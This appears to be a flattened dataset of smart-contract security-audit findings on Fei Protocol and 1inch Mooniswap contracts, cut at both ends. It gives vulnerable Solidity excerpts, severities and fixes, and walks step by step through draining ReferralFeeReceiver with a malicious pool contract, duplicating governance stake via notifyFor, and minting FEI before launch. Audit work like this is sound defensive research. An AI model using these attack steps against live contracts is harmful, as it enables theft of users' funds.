updateTimeWeight(initialDeviation, finalDeviation, weight);\\n if (incentive != 0) {\\n fei().mint(target, incentive); \\n }\\n}\\n```\\n\\n`getBuyIncentive` calculates price deviations after casting `amount` to an `int256`, which may overflow:\\n```\\nfunction getBuyIncentive(uint amount) public view override returns(\\n uint incentive,\\n uint32 weight,\\n Decimal.D256 memory initialDeviation,\\n Decimal.D256 memory finalDeviation\\n) {\\n (initialDeviation, finalDeviation) = getPriceDeviations(-1 \\* int256(amount));\\n```\\nчResolution\\nThis was addressed in fei-protocol/fei-protocol-core#15.\\nEnsure casts in `getBuyIncentive` and `getSellPenalty` do not overflow.чч```\\nfunction incentivize(\\n address sender,\\n address receiver, \\n address operator,\\n uint amountIn\\n) external override onlyFei {\\n updateOracle();\\n\\n if (isPair(sender)) {\\n incentivizeBuy(receiver, amountIn);\\n }\\n\\n if (isPair(receiver)) {\\n require(isSellAllowlisted(sender) || isSellAllowlisted(operator), \"UniswapIncentive: Blocked Fei sender or operator\");\\n incentivizeSell(sender, amountIn);\\n }\\n}\\n```\\n -BondingCurve allows users to acquire FEI before launchчmediumч`BondingCurve.allocate` allocates the protocol's held PCV, then calls `_incentivize`, which rewards the caller with FEI if a certain amount of time has passed:\\n```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n\\n`allocate` can be called before genesis launch, as long as the contract holds some nonzero PCV. By force-sending the contract 1 wei, anyone can bypass the majority of checks and actions in `allocate`, and mint themselves FEI each time the timer expires.чPrevent `allocate` from being called before genesis launch.чч```\\n/// @notice if window has passed, reward caller and reset window\\nfunction \\_incentivize() internal virtual {\\n if (isTimeEnded()) {\\n \\_initTimed(); // reset window\\n fei().mint(msg.sender, incentiveAmount);\\n }\\n}\\n```\\n -Overflow/underflow protectionчmediumчHaving overflow/underflow vulnerabilities is very common for smart contracts. It is usually mitigated by using `SafeMath` or using solidity version ^0.8 (after solidity 0.8 arithmetical operations already have default overflow/underflow protection).\\nIn this code, many arithmetical operations are used without the ‘safe' version. The reasoning behind it is that all the values are derived from the actual ETH values, so they can't overflow.\\nOn the other hand, some operations can't be checked for overflow/underflow without going much deeper into the codebase that is out of scope:\\n```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\nчResolution\\nThis was partially addressed in fei-protocol/fei-protocol-core#17 by using `SafeMath` for the specific example given in the description.\\nIn our opinion, it is still safer to have these operations in a safe mode. So we recommend using `SafeMath` or solidity version ^0.8 compiler.чч```\\nuint totalGenesisTribe = tribeBalance() - totalCommittedTribe;\\n```\\n -Unchecked return value for IWETH.transfer callчmediumчIn `EthUniswapPCVController`, there is a call to `IWETH.transfer` that does not check the return value:\\n```\\nweth.transfer(address(pair), amount);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransfer; unless one is sure the given token reverts in case of a failure.чConsider adding a require-statement or using `safeTransfer`.чч```\\nweth.transfer(address(pair), amount);\\n```\\n -GenesisGroup.emergencyExit remains functional after launchчmediumч`emergencyExit` is intended as an escape mechanism for users in the event the genesis `launch` method fails or is frozen. `emergencyExit` becomes callable 3 days after `launch` is callable. These two methods are intended to be mutually-exclusive, but are not: either method remains callable after a successful call to the other.\\nThis may result in accounting edge cases. In particular, `emergencyExit` fails to decrease `totalCommittedFGEN` by the exiting user's commitment:\\n```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n\\nAs a result, calling launch after a user performs an exit will incorrectly calculate the amount of FEI to swap:\\n```\\nuint amountFei = feiBalance() \\* totalCommittedFGEN / (totalSupply() + totalCommittedFGEN);\\nif (amountFei != 0) {\\n totalCommittedTribe = ido.swapFei(amountFei);\\n}\\n```\\nчEnsure `launch` cannot be called if `emergencyExit` has been called\\nEnsure `emergencyExit` cannot be called if `launch` has been called\\nIn `emergencyExit`, reduce `totalCommittedFGEN` by the exiting user's committed amountчч```\\nburnFrom(from, amountFGEN);\\ncommittedFGEN[from] = 0;\\n\\npayable(to).transfer(total);\\n```\\n -Unchecked return value for transferFrom callsчmediumчThere are two `transferFrom` calls that do not check the return value (some tokens signal failure by returning false):\\n```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n\\n```\\nfei().transferFrom(msg.sender, address(pair), amountFei);\\n```\\n\\nIt is usually good to add a require-statement that checks the return value or to use something like safeTransferFrom; unless one is sure the given token reverts in case of a failure.чConsider adding a require-statement or using `safeTransferFrom`.чч```\\nstakedToken.transferFrom(from, address(this), amount);\\n```\\n -Pool: claiming to the pool itself causes accounting issuesчlowч```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, \"Pool: User has no redeemable pool tokens\");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n\\nIf the destination address `to` is the pool itself, the pool will burn tokens and increment the amount of tokens claimed, then transfer the reward tokens `to` itself.чResolution\\nThis was addressed in fei-protocol/fei-protocol-core#57\\nPrevent claims from specifying the pool as a destination.чч```\\nfunction \\_claim(address from, address to) internal returns (uint256) {\\n (uint256 amountReward, uint256 amountPool) = redeemableReward(from);\\n require(amountPool != 0, \"Pool: User has no redeemable pool tokens\");\\n\\n \\_burnFrom(from, amountPool);\\n \\_incrementClaimed(amountReward);\\n\\n rewardToken.transfer(to, amountReward);\\n return amountReward;\\n}\\n```\\n -Assertions that can failчlowчIn `UniswapSingleEthRouter` there are two assert-statements that may fail:\\n```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n\\n```\\nassert(IWETH(WETH).transfer(address(PAIR), amountIn));\\n```\\n\\nSince they do some sort of input validation it might be good to replace them with require-statements. I would only use asserts for checks that should never fail and failure would constitute a bug in the code.чConsider replacing the assert-statements with require-statements. An additional benefit is that this will not result in consuming all the gas in case of a violation.чч```\\nassert(msg.sender == address(WETH)); // only accept ETH via fallback from the WETH contract\\n```\\n -Simplify API of GenesisGroup.purchaseчlowчThe API of `GenesisGroup.purchase` could be simplified by not including the `value` parameter that is required to be equivalent to msg.value:\\n```\\nrequire(msg.value == value, \"GenesisGroup: value mismatch\");\\n```\\n\\nUsing `msg.value` might make the API more explicit and avoid requiring `msg.value == value`. It can also save some gas due to fewer inputs and fewer checks.чConsider dropping the `value` parameter and changing the code to use `msg.value` instead.чч```\\nrequire(msg.value == value, \"GenesisGroup: value mismatch\");\\n```\\n -[Out of Scope] ReferralFeeReceiver - anyone can steal all the funds that belong to ReferralFeeReceiver UnverifiedчhighчNote: This issue was raised in components that were being affected by the scope reduction as outlined in the section “Scope” and are, therefore, only shallowly validated. Nevertheless, we find it important to communicate such potential findings and ask the client to further investigate.\\nThe `ReferralFeeReceiver` receives pool shares when users `swap()` tokens in the pool. A `ReferralFeeReceiver` may be used with multiple pools and, therefore, be a lucrative target as it is holding pool shares.\\nAny token or `ETH` that belongs to the `ReferralFeeReceiver` is at risk and can be drained by any user by providing a custom `mooniswap` pool contract that references existing token holdings.\\nIt should be noted that none of the functions in `ReferralFeeReceiver` verify that the user-provided `mooniswap` pool address was actually deployed by the linked `MooniswapFactory`. The factory provides certain security guarantees about `mooniswap` pool contracts (e.g. valid `mooniswap` contract, token deduplication, tokenA!=tokenB, enforced token sorting, …), however, since the `ReferralFeeReceiver` does not verify the user-provided `mooniswap` address they are left unchecked.\\nAdditional Notes\\n`freezeEpoch` - (callable by anyone) performs a `pool.withdraw()` with the `minAmounts` check being disabled. This may allow someone to call this function at a time where the contract actually gets a bad deal.\\n`trade` - (callable by anyone) can intentionally be used to perform bad trades (front-runnable)\\n`trade` - (callable by anyone) appears to implement inconsistent behavior when sending out `availableBalance`. `ETH` is sent to `tx.origin` (the caller) while tokens are sent to the user-provided `mooniswap` address.\\n```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n\\nmultiple methods - since `mooniswap` is a user-provided address there are a lot of opportunities to reenter the contract. Consider adding reentrancy guards as another security layer (e.g. `claimCurrentEpoch` and others).\\nmultiple methods - do not validate the amount of tokens that are returned, causing an evm assertion due to out of bounds index access.\\n```\\nIERC20[] memory tokens = mooniswap.getTokens();\\nuint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\nuint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n```\\n\\nin `GovernanceFeeReceiver` anyone can intentionally force unwrapping of pool tokens or perform swaps in the worst time possible. e.g. The checks for `withdraw(..., minAmounts)` is disabled.\\n```\\nfunction unwrapLPTokens(Mooniswap mooniswap) external validSpread(mooniswap) {\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n}\\n\\nfunction swap(IERC20[] memory path) external validPath(path) {\\n (uint256 amount,) = \\_maxAmountForSwap(path, path[0].uniBalanceOf(address(this)));\\n uint256 result = \\_swap(path, amount, payable(address(rewards)));\\n rewards.notifyRewardAmount(result);\\n}\\n```\\n\\nA malicious user can drain all token by calling `claimFrozenEpoch` with a custom contract as `mooniswap` that returns a token address the `ReferralFeeReceiver` contracts holds token from in `IERC20[] memory tokens = mooniswap.getTokens();`. A subsequent call to `_transferTokenShare()` will then send out any amount of token requested by the attacker to the attacker-controlled address (msg.sender).\\nLet's assume the following scenario:\\n`ReferralFeeReceiver` holds `DAI` token and we want to steal them.\\nAn attacker may be able to drain the contract from `DAI` token via `claimFrozenToken` if\\nthey control the `mooniswap` address argument and provide a malicious contract\\n`user.share[mooniswap][firstUnprocessedEpoch] > 0` - this can be arbitrarily set in `updateReward`\\n`token.epochBalance[currentEpoch].token0Balance > 0` - this can be manipulated in `freezeEpoch` by providing a malicious `mooniswap` contract\\nthey own a worthless `ERC20` token e.g. named `ATTK`\\nThe following steps outline the attack:\\nThe attacker calls into `updateReward` to set `user.share[mooniswap][currentEpoch]` to a value that is greater than zero to make sure that `share` in `claimFrozenEpoch` takes the `_transferTokenShare` path.\\n```\\nfunction updateReward(address referral, uint256 amount) external override {\\n Mooniswap mooniswap = Mooniswap(msg.sender);\\n TokenInfo storage token = tokenInfo[mooniswap];\\n UserInfo storage user = userInfo[referral];\\n uint256 currentEpoch = token.currentEpoch;\\n\\n // Add new reward to current epoch\\n user.share[mooniswap][currentEpoch] = user.share[mooniswap][currentEpoch].add(amount);\\n token.epochBalance[currentEpoch].totalSupply = token.epochBalance[currentEpoch].totalSupply.add(amount);\\n\\n // Collect all processed epochs and advance user token epoch\\n \\_collectProcessedEpochs(user, token, mooniswap, currentEpoch);\\n}\\n```\\n\\nThe attacker then calls `freezeEpoch()` providing the malicious `mooniswap` contract address controlled by the attacker.\\nThe malicious contract returns token that is controlled by the attacker (e.g. ATTK) in a call to `mooniswap.getTokens();`\\nThe contract then stores the current balance of the attacker-controlled token in `token0Balance/token1Balance`. Note that the token being returned here by the malicious contract can be different from the one we're checking out in the last step (balance manipulation via `ATTK`, checkout of `DAI` in the last step).\\nThen the contract calls out to the malicious `mooniswap` contract. This gives the malicious contract an easy opportunity to send some attacker-controlled token (ATTK) to the `ReferralFeeReceiver` in order to freely manipulate the frozen tokenbalances (tokens[0].uniBalanceOf(address(this)).sub(token0Balance);).\\nNote that the used token addresses are never stored anywhere. The balances recorded here are for an attacker-controlled token (ATTK), not the actual one that we're about to steal (e.g. DAI)\\nThe token balances are now set-up for checkout in the last step (claimFrozenEpoch).\\n```\\nfunction freezeEpoch(Mooniswap mooniswap) external validSpread(mooniswap) {\\n TokenInfo storage token = tokenInfo[mooniswap];\\n uint256 currentEpoch = token.currentEpoch;\\n require(token.firstUnprocessedEpoch == currentEpoch, \"Previous epoch is not finalized\");\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n uint256 token0Balance = tokens[0].uniBalanceOf(address(this));\\n uint256 token1Balance = tokens[1].uniBalanceOf(address(this));\\n mooniswap.withdraw(mooniswap.balanceOf(address(this)), new uint256[](0));\\n token.epochBalance[currentEpoch].token0Balance = tokens[0].uniBalanceOf(address(this)).sub(token0Balance);\\n token.epochBalance[currentEpoch].token1Balance = tokens[1].uniBalanceOf(address(this)).sub(token1Balance);\\n token.currentEpoch = currentEpoch.add(1);\\n}\\n```\\n\\nA call to `claimFrozenEpoch` checks-out the previously frozen token balance.\\nThe `claim > 0` requirement was fulfilled in step 1.\\nThe token balance was prepared for the attacker-controlled token (ATTK) in step 2, but we're now checking out `DAI`.\\nWhen the contract calls out to the attackers `mooniswap` contract the call to `IERC20[] memory tokens = mooniswap.getTokens();` returns the address of the token to be stolen (e.g. DAI) instead of the attacker-controlled token (ATTK) that was used to set-up the balance records.\\nSubsequently, the valuable target tokens (DAI) are sent out to the caller in `_transferTokenShare`.\\n```\\nif (share > 0) {\\n EpochBalance storage epochBalance = token.epochBalance[firstUnprocessedEpoch];\\n uint256 totalSupply = epochBalance.totalSupply;\\n user.share[mooniswap][firstUnprocessedEpoch] = 0;\\n epochBalance.totalSupply = totalSupply.sub(share);\\n\\n IERC20[] memory tokens = mooniswap.getTokens();\\n epochBalance.token0Balance = \\_transferTokenShare(tokens[0], epochBalance.token0Balance, share, totalSupply);\\n epochBalance.token1Balance = \\_transferTokenShare(tokens[1], epochBalance.token1Balance, share, totalSupply);\\n epochBalance.inchBalance = \\_transferTokenShare(inchToken, epochBalance.inchBalance, share, totalSupply);\\n```\\nчResolution\\nAccording to the client, this issue is addressed in 1inch-exchange/1inch-liquidity-protocol#2 and the reentrancy in `FeeReceiver` in 1inch-exchange/[email protected]e9c6a03\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nEnforce that the user-provided `mooniswap` contract was actually deployed by the linked factory. Other contracts cannot be trusted. Consider implementing token sorting and de-duplication (tokenA!=tokenB) in the pool contract constructor as well. Consider employing a reentrancy guard to safeguard the contract from reentrancy attacks.\\nImprove testing. The methods mentioned here are not covered at all. Improve documentation and provide a specification that outlines how this contract is supposed to be used.\\nReview the “additional notes” provided with this issue.чч```\\nif (path[0].isETH()) {\\n tx.origin.transfer(availableBalance); // solhint-disable-line avoid-tx-origin\\n} else {\\n path[0].safeTransfer(address(mooniswap), availableBalance);\\n}\\n```\\n -GovernanceMothership - notifyFor allows to arbitrarily create new or override other users stake in governance modules UnverifiedчhighчThe `notify*` methods are called to update linked governance modules when an accounts stake changes in the Mothership. The linked modules then update their own balances of the user to accurately reflect the account's real stake in the Mothership.\\nBesides `notify` there's also a method named `notifyFor` which is publicly accessible. It is assumed that the method should be used similar to `notify` to force an update for another account's balance.\\nHowever, invoking the method forces an update in the linked modules for the provided address, but takes `balanceOf(msg.sender)` instead of `balanceOf(account)`. This allows malicious actors to:\\nArbitrarily change other accounts stake in linked governance modules (e.g. zeroing stake, increasing stake) based on the callers stake in the mothership\\nDuplicate stake out of thin air to arbitrary addresses (e.g. staking in mothership once and calling `notifyFor` many other account addresses)\\npublicly accessible method allows forcing stake updates for arbitrary users\\n```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n\\nthe method calls the linked governance modules\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nwhich will arbitrarily `mint` or `burn` stake in the `BalanceAccounting` of `Factory` or `Reward` (or other linked governance modules)\\n```\\nfunction notifyStakeChanged(address account, uint256 newBalance) external override onlyMothership {\\n \\_notifyStakeChanged(account, newBalance);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n } else {\\n return;\\n }\\n uint256 newTotalSupply = totalSupply();\\n\\n \\_defaultFee.updateBalance(account, \\_defaultFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_FEE, \\_emitDefaultFeeVoteUpdate);\\n \\_defaultSlippageFee.updateBalance(account, \\_defaultSlippageFee.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_SLIPPAGE\\_FEE, \\_emitDefaultSlippageFeeVoteUpdate);\\n \\_defaultDecayPeriod.updateBalance(account, \\_defaultDecayPeriod.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_DECAY\\_PERIOD, \\_emitDefaultDecayPeriodVoteUpdate);\\n \\_referralShare.updateBalance(account, \\_referralShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_REFERRAL\\_SHARE, \\_emitReferralShareVoteUpdate);\\n \\_governanceShare.updateBalance(account, \\_governanceShare.votes[account], balance, newBalance, newTotalSupply, \\_DEFAULT\\_GOVERNANCE\\_SHARE, \\_emitGovernanceShareVoteUpdate);\\n}\\n```\\n\\n```\\nfunction \\_notifyStakeChanged(address account, uint256 newBalance) internal override updateReward(account) {\\n uint256 balance = balanceOf(account);\\n if (newBalance > balance) {\\n \\_mint(account, newBalance.sub(balance));\\n } else if (newBalance < balance) {\\n \\_burn(account, balance.sub(newBalance));\\n }\\n}\\n```\\nчRemove `notifyFor` or change it to take the balance of the correct account `_notifyFor(account, balanceOf(msg.sender))`.\\nIt is questionable whether the public `notify*()` family of methods is actually needed as stake should only change - and thus an update of linked modules should only be required - if an account calls `stake()` or `unstake()`. It should therefore be considered to remove `notify()`, `notifyFor` and `batchNotifyFor`.чч```\\nfunction notifyFor(address account) external {\\n \\_notifyFor(account, balanceOf(msg.sender));\\n}\\n```\\n -The uniTransferFrom function can potentially be used with invalid params UnverifiedчmediumчThe system is using the `UniERC20` contract to incapsulate transfers of both ERC-20 tokens and ETH. This contract has `uniTransferFrom` function that can be used for any ERC-20 or ETH:\\n```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n require(msg.value >= amount, \"UniERC20: not enough value\");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n\\nIn case if the function is called for the normal ERC-20 token, everything works as expected. The tokens are transferred `from` the `from` address `to` the `to` address. If the token is ETH - the transfer is expected `to` be `from` the `msg.sender` `to` `this` contract. Even if the `to` and `from` parameters are different.\\nThis issue's severity is not high because the function is always called with the proper parameters in the current codebase.чResolution\\nAccording to the client, this issue is addressed in 1inch-exchange/[email protected]d0ffb6f.\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nMake sure that the `uniTransferFrom` function is always called with expected parameters.чч```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n require(msg.value >= amount, \"UniERC20: not enough value\");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n -MooniswapGovernance - votingpower is not accurately reflected when minting pool tokens UnverifiedчmediumчWhen a user provides liquidity to the pool, pool-tokens are minted. The minting event triggers the `_beforeTokenTransfer` callback in `MooniswapGovernance` which updates voting power reflecting the newly minted stake for the user.\\nThere seems to be a copy-paste error in the way `balanceTo` is determined that sets `balanceTo` to zero if new token were minted (from==address(0)). This means, that in a later call to `_updateOnTransfer` only the newly minted amount is considered when adjusting voting power.\\nIf tokens are newly minted `from==address(0)` and therefore `balanceTo -> 0`.\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n\\nnow, `balanceTo` is zero which would adjust voting power to `amount` instead of the user's actual balance + the newly minted token.\\n```\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\nч`balanceTo` should be zero when burning (to == address(0)) and `balanceOf(to)` when minting.\\ne.g. like this:\\n```\\nuint256 balanceTo = (to != address(0)) ? balanceOf(to) : 0;\\n```\\nчч```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n -MooniswapGovernance - _beforeTokenTransfer should not update voting power on transfers to self UnverifiedчmediumчMooniswap governance is based on the liquidity voting system that is also employed by the mothership or for factory governance. In contrast to traditional voting systems where users vote for discrete values, the liquidity voting system derives a continuous weighted averaged “consensus” value from all the votes. Thus it is required that whenever stake changes in the system, all the parameters that can be voted upon are updated with the new weights for a specific user.\\nThe Mooniswap pool is governed by liquidity providers and liquidity tokens are the stake that gives voting rights in `MooniswapGovernance`. Thus whenever liquidity tokens are transferred to another address, stake and voting values need to be updated. This is handled by `MooniswapGovernance._beforeTokenTransfer()`.\\nIn the special case where someone triggers a token transfer where the `from` address equals the `to` address, effectively sending the token `to` themselves, no update on voting power should be performed. Instead, voting power is first updated with `balance - amount` and then with `balance + amount` which in the worst case means it is updating first `to` a zero balance and then `to` 2x the balance.\\nUltimately this should not have an effect on the overall outcome but is unnecessary and wasting gas.\\n`beforeTokenTransfer` callback in `Mooniswap` does not check for the NOP case where `from==to`\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n\\nwhich leads to `updateBalance` being called on the same address twice, first with `currentBalance - amountTransferred` and then with `currentBalance + amountTransferred`.\\n```\\nif (params.from != address(0)) {\\n votingData.updateBalance(params.from, voteFrom, params.balanceFrom, params.balanceFrom.sub(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\nчDo not update voting power on LP token transfers where `from == to`.чч```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n -Unpredictable behavior for users due to admin front running or general bad timingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nMooniswapFactoryGovernance - Admin opportunity to lock `swapFor` with a referral when setting an invalid `referralFeeReceiver`\\n`setReferralFeeReceiver` and `setGovernanceFeeReceiver` takes effect immediately.\\n```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n\\n`setReferralFeeReceiver` can be used to set an invalid receiver address (or one that reverts on every call) effectively rendering `Mooniswap.swapFor` unusable if a referral was specified in the swap.\\n```\\nif (referral != address(0)) {\\n referralShare = invIncrease.mul(referralShare).div(\\_FEE\\_DENOMINATOR);\\n if (referralShare > 0) {\\n if (referralFeeReceiver != address(0)) {\\n \\_mint(referralFeeReceiver, referralShare);\\n IReferralFeeReceiver(referralFeeReceiver).updateReward(referral, referralShare);\\n```\\n\\nLocking staked token\\nAt any point in time and without prior notice to users an admin may accidentally or intentionally add a broken governance sub-module to the system that blocks all users from unstaking their `1INCH` token. An admin can recover from this by removing the broken sub-module, however, with malicious intent tokens may be locked forever.\\nSince `1INCH` token gives voting power in the system, tokens are considered to hold value for other users and may be traded on exchanges. This raises concerns if tokens can be locked in a contract by one actor.\\nAn admin adds an invalid address or a malicious sub-module to the governance contract that always `reverts` on calls to `notifyStakeChanged`.\\n```\\nfunction addModule(address module) external onlyOwner {\\n require(\\_modules.add(module), \"Module already registered\");\\n emit AddModule(module);\\n}\\n```\\n\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nAdmin front-running to prevent user stake sync\\nAn admin may front-run users while staking in an attempt to prevent submodules from being notified of the stake update. This is unlikely to happen as it incurs costs for the attacker (front-back-running) to normal users but may be an interesting attack scenario to exclude a whale's stake from voting.\\nFor example, an admin may front-run `stake()` or `notoify*()` by briefly removing all governance submodules from the mothership and re-adding them after the users call succeeded. The stake-update will not be propagated to the sub-modules. A user may only detect this when they are voting (if they had no stake before) or when they actually check their stake. Such an attack might likely stay unnoticed unless someone listens for `addmodule` `removemodule` events on the contract.\\nAn admin front-runs a transaction by removing all modules and re-adding them afterwards to prevent the stake from propagating to the submodules.\\n```\\nfunction removeModule(address module) external onlyOwner {\\n require(\\_modules.remove(module), \"Module was not registered\");\\n emit RemoveModule(module);\\n}\\n```\\n\\nAdmin front-running to prevent unstake from propagating\\nAn admin may choose to front-run their own `unstake()`, temporarily removing all governance sub-modules, preventing `unstake()` from syncing the action to sub-modules while still getting their previously staked tokens out. The governance sub-modules can be re-added right after unstaking. Due to double-accounting of the stake (in governance and in every sub-module) their stake will still be exercisable in the sub-module even though it was removed from the mothership. Users can only prevent this by manually calling a state-sync on the affected account(s).чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nFurthermore, users should be guaranteed to be able to redeem their staked tokens. An entity - even though trusted - in the system should not be able to lock tokens indefinitely.чч```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n -The owner can borrow token0/token1 in the rescueFundsчlowчIf some random tokens/funds are accidentally transferred to the pool, the `owner` can call the `rescueFunds` function to withdraw any funds manually:\\n```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, \"Mooniswap: access denied\");\\n require(token1.uniBalanceOf(address(this)) >= balance1, \"Mooniswap: access denied\");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, \"Mooniswap: access denied\");\\n}\\n```\\n\\nThere's no restriction on which funds the `owner` can try to withdraw and which token to call. It's theoretically possible to transfer pool tokens and then return them to the contract (e.g. in the case of ERC-777). That action would be similar to a free flash loan.чExplicitly check that the `token` is not equal to any of the pool tokens.чч```\\nfunction rescueFunds(IERC20 